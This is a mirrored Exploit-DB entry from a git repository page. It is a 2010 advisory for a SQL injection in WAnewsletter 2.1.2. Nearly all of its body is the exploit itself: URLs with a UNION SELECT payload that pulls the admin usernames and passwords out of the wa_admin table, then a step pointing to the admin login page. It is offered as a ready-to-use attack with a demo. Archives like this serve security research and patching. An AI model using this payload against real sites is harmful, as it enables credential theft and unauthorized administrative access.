bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15090.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

39 lines
No EOL
986 B
Text
Raw Blame History

================================================
WAnewsletter v 2.1.2 SQL Injection Vulnerability
================================================
################################################################################################
# Exploit Title: WAnewsletter v 2.1.2 SQL Injection Vulnerabilitie
# Date: 23/09/2010
# Author: BrOx-Dz
# Author: E.dz@hotmail.fr
# Software Link:http://phpcodeur.net/wascripts/wanewsletter/releases/2.1.2/wanewsletter-2.1.2.zip
# Dork : no Kids
# Version: 2.1.2
# Tested on: windows xp pack 3
################################################################################################
--[ Exploitable ]--
http://site/index.php?service=5&id=[SQL Injection]
http://site/index.php?service=5&id=4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--
and go
http://site/admin/login.php
--[ Demo ]--
http://site/index.php?service=5&id=-4375+UNION+SELECT+1,2,3,concat(user,0x3a,passwd),5+from+wa_admin--
Good Luck
Reference in a new issue View git blame Copy permalink